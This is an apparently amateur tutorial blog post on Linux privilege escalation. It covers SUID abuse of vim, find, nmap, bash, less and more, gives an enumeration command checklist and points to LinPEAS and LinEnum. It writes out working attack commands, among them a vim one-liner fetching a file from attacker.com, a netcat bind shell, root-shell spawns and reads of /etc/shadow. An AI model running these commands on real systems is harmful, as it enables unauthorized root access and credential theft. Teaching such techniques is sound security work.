Hi Guys,

This is my First blog about Linux Privilege escalation. So Without wasting any time Let’s Start I’ll start with basics. So,

/* WHAT IS LINUX AND PRIVILEGE ESCALATION? */

1. Linux -: Linux is the best-known and most-used open-source operating system. As an operating system, Linux is software that sits underneath all of the other software on a computer, receiving requests from those programs and relaying these requests to the computer’s hardware.

2. PRIVILEGE ESCALATION -: Privilege escalation is a common way for attackers to gain unauthorized access to systems within a security perimeter.

Attackers start by finding weak points in an organization’s defenses and gaining access to a system. In many cases that the first point of penetration will not grant attackers with the level of access or data they need. They will then attempt privilege escalation to gain more permissions or obtain access to additional, more sensitive systems.

/* WHY PRIVILEGE ESCALATION IS IMPORTANT ? */

While usually not the main aim of an attacker, privilege escalation is frequently used in preparation for a more specific attack, allowing intruders to deploy a malicious payload or execute malicious code in the targeted system. This means that whenever you detect or suspect privilege escalation, you also need to look for signs of other malicious activity. However, even without evidence of further attacks, any privilege escalation incident is an information security issue in itself, because someone could have gained unauthorized access to personal, confidential, or otherwise sensitive data. In many cases, this will have to be reported internally or to the relevant authorities to ensure compliance.

So here we covered some theoretical part the meaning of privilege escalation is gaining access on the root with a non-root account.

Privilege Escalation through SUID.

SUID-: setuid and setgid are Unix access rights flags that allow users to run an executable.

List of executables -:

  1. vim
  2. find
  3. Nmap
  4. bash
  5. less
  6. more

How to Find Files with SUID Set in Linux?

$find . -perm /4000

you can add more things in this like -l(long listing).

1.VIM -: Vim is a highly configurable text editor built to enable efficient text editing. It is an improved version of the vi editor distributed with most UNIX/Linux systems. If vim is running as a suid it can access some root files.

you can access any file you can do many things like spawning shell

like this -;

1.vim.tiny /etc/shadow

2. Press ESC key

    :set shell=/bin/sh

     :shell

3.file download-:

export URL=http://attacker.com/file_to_get

export LFILE=file_to_save

vim -c ‘:py import vim,sys; from os import environ as e

if sys.version_info.major == 3: import urllib.request as r

else: import urllib as r

r.urlretrieve(e[“URL”], e[“LFILE”])

vim.command(“:q!”)’

for more checkout.

2. find

find -: find is used to find files

touch *****

find ***** -exec whoami \;

getting  shell

find software_user -exec netcat -lvp 5555 -e /bin/sh \;

netcat 192.*.*.* 5555

3. NMAP

nmap -: Older versions of Nmap (2.02 to 5.21) had an interactive mode. and through this interactive mode, you can spawn root shell.

  1. nmap -V (for finding version )
  2. nmap –interactive
  3. nmap> !sh
  4. whoami
  5. root

hehe yeah it was easy

4. BASH

bash -: On Linux, bash is the standard shell for common users.

open a bash shell as root.

1.bash -p

5 . less

less -: less is a command that displays file contents

1.less /etc/shadow;

2.!/bin/sh

important – this will not work always don’t depend on less I showed from metasploitable VM

6. More

more -: more command is used to view the text files.

the same logic of less will apply of here (more )

Some Important commands 🙂

1. What is the version?

cat /etc/issue

cat /etc/*-release

cat /etc/lsb-release

2. Is it 64-bit or 32-bit?

cat /proc/version

uname -a

3 . Finding environmental variables!

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

env

set

4. Any printer connected to the machine?

lpstat -a

5. Which services are running?

ps aux

ps -ef

top

cat /etc/service

shows that services which are running by root

ps aux | grep root

ps -ef | grep root

6. Wich applications are installed and versions and they’re running or not?

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

7. Setings of services are misconfigured or vulnerable

cat /etc/syslog.conf

cat /etc/cups/cupsd.conf

cat /etc/apache2/apache2.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

8. Services or jobs are scheduled?

cat /var/spool/cron/crontabs/root

ls -al /etc/ | grep cron

ls -al /etc/cron*

9 . Which NIC machine have ?

/sbin/ifconfig -a

10. Network configuration settings

iptables -L

hostname

dnsdomainname

11. Tunnelling possible? Send commands locally, remotely

ssh -D 127.0.0.1:9050 -N [username]@[ip]

proxychains ifconfig

12. Sensitive files can be found?

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ls -alh /var/mail/

13. Finding log’s

cat /etc/httpd/logs/access_log

cat /etc/httpd/logs/access.log

cat /etc/httpd/logs/error_log

cat /etc/httpd/logs/error.log

cat /var/log/apache2/access_log

cat /var/log/apache2/access.log

cat /var/log/apache2/error_log

cat /var/log/apache2/error.log

cat /var/log/apache/access_log

cat /var/log/apache/access.log

cat /var/log/auth.log

cat /var/log/cups/error_log

cat /var/log/dpkg.log

14. Shell spawn

python -c ‘import pty;pty.spawn(“/bin/bash”)’

echo os.system(‘/bin/bash’)

/bin/sh -i

15. How can files be uploaded?

find / -name wget

find / -name nc*

find / -name netcat*

find / -name tftp*

find / -name ftp

17. Tools/languages are installed/supported?

ind / -name perl*

find / -name python*

find / -name gcc*

find / -name cc

19. Anything “interesting” in the home directories(only if dir’s are accessible)

ls -ahlR /root/

ls -ahlR /home/

20. Whats cached? IP and/or MAC addresses

arp -e

route

/sbin/route -nee

*/We covered a lot of commands now I m going to tell about the most common tool is used for priv esc.*/

LINPEAS – LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix. i use this because it’s too good for priv esc always try to use linpeas if you have permission to read and execute

LINK https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/README.md

also, linENUM is a good tool

link – https://github.com/rebootuser/LinEnum

but for me mostly linpeas works.

Thanks for reading guys,

See-ya,

happy-hacking

Author:

SoftwareUser_